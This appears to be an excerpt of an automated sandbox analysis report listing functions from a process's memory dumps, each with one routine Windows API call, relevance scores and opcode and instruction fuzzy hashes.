                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: ec10a601ee5a0e100b3c5550194843d401bed7f1adff7c39448534dd6b17de54
                                                                                            • Instruction ID: 2be2388544c90d75af36ab83ca76a4c8aa3e3e15e74257224564e388b1dc7972
                                                                                            • Opcode Fuzzy Hash: ec10a601ee5a0e100b3c5550194843d401bed7f1adff7c39448534dd6b17de54
                                                                                            • Instruction Fuzzy Hash: 4F119072500304EFEB21CF55DC85FAAF7ACEF04764F14856AF9459A641DA70A9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02850FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 245e2f54d6b08b59f0edeb46da3bf4d5f9a640d9ccaeb9b246852f1a3d451540
                                                                                            • Instruction ID: accfb1f72f078cd592235c93656e5444d5f576d0c94c93da3b68c846ca27683c
                                                                                            • Opcode Fuzzy Hash: 245e2f54d6b08b59f0edeb46da3bf4d5f9a640d9ccaeb9b246852f1a3d451540
                                                                                            • Instruction Fuzzy Hash: EB21797550D3C49FDB128B25CC55B92BFA4AF06224F0884DAED88CF693D2649808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 25dfeec0333c190af5bfba5478c23f2a2d3b1953d6a72f30a01c17be2f227def
                                                                                            • Instruction ID: 4798d44bc5056b2f9b60562d5a0b909d1c9ae13de4fc94e32408c6c5c444d7ee
                                                                                            • Opcode Fuzzy Hash: 25dfeec0333c190af5bfba5478c23f2a2d3b1953d6a72f30a01c17be2f227def
                                                                                            • Instruction Fuzzy Hash: 112192765083809FDB21CF25DC45B96FFF4EF06220F08849AED898B562D235A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: e342b4f984a8e95e7deae8bcaa8b883f91e6496eab0f5f5f0ca42369b92d5131
                                                                                            • Instruction ID: 486dee1bbb565a2f71e68a8c1008885c579b2326f444b9a738fafa9d9dee8246
                                                                                            • Opcode Fuzzy Hash: e342b4f984a8e95e7deae8bcaa8b883f91e6496eab0f5f5f0ca42369b92d5131
                                                                                            • Instruction Fuzzy Hash: 27117C71600344EFEB20CF15DC85FAAFBACEF04664F14846AED09CB641DA74E9048AB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0269AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: eb30d3650d7a1024bfbb0fd26ce1a0be2caaf2f4b8c564f5ecef2ec58f2f6272
                                                                                            • Instruction ID: a36fac6bb58ea3d1341eb0ac0ecc89946c2543a6375f5a8ef875575de3d01d77
                                                                                            • Opcode Fuzzy Hash: eb30d3650d7a1024bfbb0fd26ce1a0be2caaf2f4b8c564f5ecef2ec58f2f6272
                                                                                            • Instruction Fuzzy Hash: 7B217FB16093809FDB22CF65DC44B52FFE8EF46614F0884AAED49CB252D765E808DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0269BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 29d23c2dd319e92f123148bbd001eed1ff07f4f773fed2b44e9baebb884a948c
                                                                                            • Instruction ID: 662a5f9e161421d04555c667f8c1659e937dc6057204295320b4a53afacc149a
                                                                                            • Opcode Fuzzy Hash: 29d23c2dd319e92f123148bbd001eed1ff07f4f773fed2b44e9baebb884a948c
                                                                                            • Instruction Fuzzy Hash: ED219F725093C09FEB12CF25DC55B92BFA4EF07224F0984DADD858F2A3D624A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028510D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02851148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 56f94e0420b36c5193f5c27be0edb9c8fdb2f7aebfef6ed8fb8cd7006d8d7de5
                                                                                            • Instruction ID: d2da91542ac3fdde0ffd47038e0fc25ebc25f0ebb9d08e8c620752bc42297f31
                                                                                            • Opcode Fuzzy Hash: 56f94e0420b36c5193f5c27be0edb9c8fdb2f7aebfef6ed8fb8cd7006d8d7de5
                                                                                            • Instruction Fuzzy Hash: F7219D6540D3C09FD7138B258C54B62BFB4EF57620F0980CBDC888F2A3D2296808D7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 0269AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: ef47742b82e2792e8265865815ebf0ec710ea0428526155a4e8bcd9fb08b5477
                                                                                            • Instruction ID: ead3786e51f50d7af30a7dcfde667f6a62bed671c10f17171e50d92a6de41de6
                                                                                            • Opcode Fuzzy Hash: ef47742b82e2792e8265865815ebf0ec710ea0428526155a4e8bcd9fb08b5477
                                                                                            • Instruction Fuzzy Hash: 5A11BF72500304EFEB21DF55DC85BAAFBECEF44720F14846AED099A281DA70A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 028508E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 2e44e4f93264e0effcb8f0b89af14bff5616e07dc7714e850b05a18a13a0bba9
                                                                                            • Instruction ID: 02b195691acd62044b4e539743d909d9b49c8a51f5216997cd9d49b281e7f181
                                                                                            • Opcode Fuzzy Hash: 2e44e4f93264e0effcb8f0b89af14bff5616e07dc7714e850b05a18a13a0bba9
                                                                                            • Instruction Fuzzy Hash: 14110176500304EFFB21CF50DC41FAAFBE8EF08720F14845AEE099A241C270A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0269BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 5db3e919cc8669a482aad69ce423536b9acc99e6fea05fc1c87bf3eb6e1615f1
                                                                                            • Instruction ID: 2867ba64975c882a53b592545a8a14c8d8e8f1fa44d456d9240b081d26f137d2
                                                                                            • Opcode Fuzzy Hash: 5db3e919cc8669a482aad69ce423536b9acc99e6fea05fc1c87bf3eb6e1615f1
                                                                                            • Instruction Fuzzy Hash: B6117F72508384AFDB22CF65DC45B52FFF8EF05214F08849EEA898B662D375E418DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028512D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0285132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 5112f5f05042114b06a575d3f3063958c8cb2ded35fc5aacfa88aa602186977e
                                                                                            • Instruction ID: 4350f6c3d6f8ffbfc5e19893aafd1b8b6c6d1f788d87fa1c2ee00afb1dd8b0f8
                                                                                            • Opcode Fuzzy Hash: 5112f5f05042114b06a575d3f3063958c8cb2ded35fc5aacfa88aa602186977e
                                                                                            • Instruction Fuzzy Hash: E411C1755083849FDB11CF25DC49B96FFE4EF06220F0884EEED498B252D239A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0269A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: e77a5d5db63a6ffca556b5c4e9659755f5d677ab23456d20673de591e6e6468a
                                                                                            • Instruction ID: f6b9882c77a0fdfe809f8c931457da57087025cbae87368ec55fa44d8236fe1d
                                                                                            • Opcode Fuzzy Hash: e77a5d5db63a6ffca556b5c4e9659755f5d677ab23456d20673de591e6e6468a
                                                                                            • Instruction Fuzzy Hash: 23116A715093C49FEB128B25DC54BA2BFB4DF47624F1880CAEDC58B263D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028505E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02850640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 1a9256782f0e3b5f0745f514f33f923e62230d6f0ffc0667375083f14b4fed70
                                                                                            • Instruction ID: 33240c5d0d242cba37c9e8ee199a49a6b06fd0a94ef70ac10f71ebc6793bd18d
                                                                                            • Opcode Fuzzy Hash: 1a9256782f0e3b5f0745f514f33f923e62230d6f0ffc0667375083f14b4fed70
                                                                                            • Instruction Fuzzy Hash: 2E1102B55093C09FDB128F15DC94B52FFB4DF06220F0880DBED898B663D264A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0285099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: f2a1d035278a84629a62380dfca0d1308c11c97cc99ef52e036e22299256bc05
                                                                                            • Instruction ID: 460bd195caa50ee988ea86d81d70af73cef641a5ed597b483a64a966e1bf8ae7
                                                                                            • Opcode Fuzzy Hash: f2a1d035278a84629a62380dfca0d1308c11c97cc99ef52e036e22299256bc05
                                                                                            • Instruction Fuzzy Hash: CC11BF759093C49FE712CB25DC55B92FFB4EF07324F0980DADD888B263C265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0269AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 8be6fa2ff9b164d444703f7e60cd4bac6f4759ec603be772ea8b5a5bcc3ff52c
                                                                                            • Instruction ID: 2bf9f4e081fe241fa9c82af230bc151a13622c8ab446605cd69799f496e93aeb
                                                                                            • Opcode Fuzzy Hash: 8be6fa2ff9b164d444703f7e60cd4bac6f4759ec603be772ea8b5a5bcc3ff52c
                                                                                            • Instruction Fuzzy Hash: 72115EB16003009FEF20DF65DC85B56FBD8EB05625F08846ADD49CB745DB74E804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0269AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 6fa1ce156bbd1185473111133ad69601bc99f63471873eafda960726e3c32487
                                                                                            • Instruction ID: a1c74f8638caf3334c6fccc80666c97f1574acbf19b522ddf008bddea628bcc9
                                                                                            • Opcode Fuzzy Hash: 6fa1ce156bbd1185473111133ad69601bc99f63471873eafda960726e3c32487
                                                                                            • Instruction Fuzzy Hash: 2011E37550D7C49FDB128B11DC85B92BFB4EF03224F0980DBDD858F263D269A909C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028507C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FE6A3AD0,00000000,00000000,00000000,00000000), ref: 02850819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 0e4fc650b3fac8e1f7a23103853617d97ded3d1824df99203221a25f4fae2c74
                                                                                            • Instruction ID: 20eeb95571b91bd0867d67761c64cb7152b736f373b4db5e9b5c5d87f6f89c8a
                                                                                            • Opcode Fuzzy Hash: 0e4fc650b3fac8e1f7a23103853617d97ded3d1824df99203221a25f4fae2c74
                                                                                            • Instruction Fuzzy Hash: AB01D279500704EFFB20DF01DC85FA6FB98DF04725F14C096EE099B241D678A904CAB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028513AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: c341594225238fc17f29484242c7c93921fb6b60e6e8bc520d1bd86d8247466c
                                                                                            • Instruction ID: 55a3f2fdf0c1f2850b40d3556aa1f5b06262aa0fa9e7ab7097fef695c57ca458
                                                                                            • Opcode Fuzzy Hash: c341594225238fc17f29484242c7c93921fb6b60e6e8bc520d1bd86d8247466c
                                                                                            • Instruction Fuzzy Hash: 36117C79600700DBEB20CF55D889B66FBA4EB04620F08C4AADD49CA651D275E444DA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0269ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 066f774474b5b1e75adf0e8452e4ef4eee6342d295ac1494c3c3cef1680dfac1
                                                                                            • Instruction ID: 49da77aae0975ca21ac7a67a3f385a3da59550e384ceb24e7815acbfb71f0a4f
                                                                                            • Opcode Fuzzy Hash: 066f774474b5b1e75adf0e8452e4ef4eee6342d295ac1494c3c3cef1680dfac1
                                                                                            • Instruction Fuzzy Hash: 5311CEB59093849FDB11CF65DC85B82FFE8EF02224F0980ABDD488F253D274A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0269BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 340aacffe07974aa60e1bc635462e7cc643b0f76ff4898b1537e300183f9ffb3
                                                                                            • Instruction ID: 0f0e8618b599c707255ea9b282f55b66704a27e32ce9a0f798f81745eb35fa8f
                                                                                            • Opcode Fuzzy Hash: 340aacffe07974aa60e1bc635462e7cc643b0f76ff4898b1537e300183f9ffb3
                                                                                            • Instruction Fuzzy Hash: E1118E72500704DFDF20CF55DC84B52FBE8EF04624F0884AADE498A612D771E414DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028501D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: ee0d07db6d676027d619b77debebc6a44475dcf842a24906f2187fac2bd2f4db
                                                                                            • Instruction ID: 4e2b50ddf17491e4ca27add745898dc74712418583204a48767e2387a501b71b
                                                                                            • Opcode Fuzzy Hash: ee0d07db6d676027d619b77debebc6a44475dcf842a24906f2187fac2bd2f4db
                                                                                            • Instruction Fuzzy Hash: B7019E796003048FEB10DF25DC85766FB98EB04724F1884AADD09CB642D774E404CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0285109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 969e63e767b4e3dbbbe6ce5a1f8e90acaba76719dbb8ceab6d9462e756321470
                                                                                            • Instruction ID: 50064af1a8d64511d78cabc500685b933061e57a830d4120142ab6035805c9f7
                                                                                            • Opcode Fuzzy Hash: 969e63e767b4e3dbbbe6ce5a1f8e90acaba76719dbb8ceab6d9462e756321470
                                                                                            • Instruction Fuzzy Hash: BF0171B1900600ABE310DF16DD46B66FBA8FB84A60F24816AED099B741D235B915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0269A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: f1026bcf21fdeedba625ba48157f9d0618e8bc825b8ac0dbac318b46473b898b
                                                                                            • Instruction ID: 00f0255e0903be976685dce81b964870c30ea20655369ac554a58bffc08f0af5
                                                                                            • Opcode Fuzzy Hash: f1026bcf21fdeedba625ba48157f9d0618e8bc825b8ac0dbac318b46473b898b
                                                                                            • Instruction Fuzzy Hash: 670184B1900600AFE710DF16DD46B66FBE8FB84A60F24816AED089B741D235F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028512FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0285132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: a805339f875ab257628f89d2388b3a4542de3a77dc7413fa4c937c9523eabd85
                                                                                            • Instruction ID: 0607dcb6802deb165ca6714126f2ac2d2522b35b1b8ac1bf7f7ad55d324e826f
                                                                                            • Opcode Fuzzy Hash: a805339f875ab257628f89d2388b3a4542de3a77dc7413fa4c937c9523eabd85
                                                                                            • Instruction Fuzzy Hash: 3501BC79A04304DFEF10CF15D8897A9FBA4EF04620F48C4AADD09CBA42D279A404CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 0269BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 4c8712d482aa86910745880380852cc78ab2ef648d170e45757eb7698cff7549
                                                                                            • Instruction ID: e66a545cfd5f2410d287ebfb75d45de6fb48148223603ea0d5ad537a6429f0b2
                                                                                            • Opcode Fuzzy Hash: 4c8712d482aa86910745880380852cc78ab2ef648d170e45757eb7698cff7549
                                                                                            • Instruction Fuzzy Hash: EA01DF71A00200DFEF20CF15EC857A5FBA8EF04624F08C4AADD098B79ADA75A804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028504B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02850502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 519d8779120f000423d893eeb833ae33c4fab755931c824a377af19af38930a5
                                                                                            • Instruction ID: 4ac1082ef1622e0dd7244ee0e6bb5cd9db7e8bab0895ecc8c65e79d63efb6876
                                                                                            • Opcode Fuzzy Hash: 519d8779120f000423d893eeb833ae33c4fab755931c824a377af19af38930a5
                                                                                            • Instruction Fuzzy Hash: 92016271A40600ABD310DF16DD46B26FBA8FB88B60F24815AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02850F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02850FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: de611b8bc2527ada2c1bf00e0fa56863f52e56a121216a8af71508f22dc0a7d5
                                                                                            • Instruction ID: b7c4321b01cdb6fd452dc441f669073d63d31d128d30db72f96254c014194275
                                                                                            • Opcode Fuzzy Hash: de611b8bc2527ada2c1bf00e0fa56863f52e56a121216a8af71508f22dc0a7d5
                                                                                            • Instruction Fuzzy Hash: 4D017C79904344DFEB10DF15D885B66FB94EB04764F1884AADD09CF686D374E404CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0269A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0269A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117224541.000000000269A000.00000040.00000001.sdmp, Offset: 0269A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: b62e071738752b300cab0aa0e00668a40a4f5cbd53423074927b623307f3ee84
                                                                                            • Instruction ID: b4dcacb92e5202e93bc81f9ed7aac7026b42f5a33b80742b5c146227d05fb720
                                                                                            • Opcode Fuzzy Hash: b62e071738752b300cab0aa0e00668a40a4f5cbd53423074927b623307f3ee84
                                                                                            • Instruction Fuzzy Hash: A6018671A40600ABD310DF16DD46B26FBF8FB88B60F24815AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0285060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02850640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2117776242.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
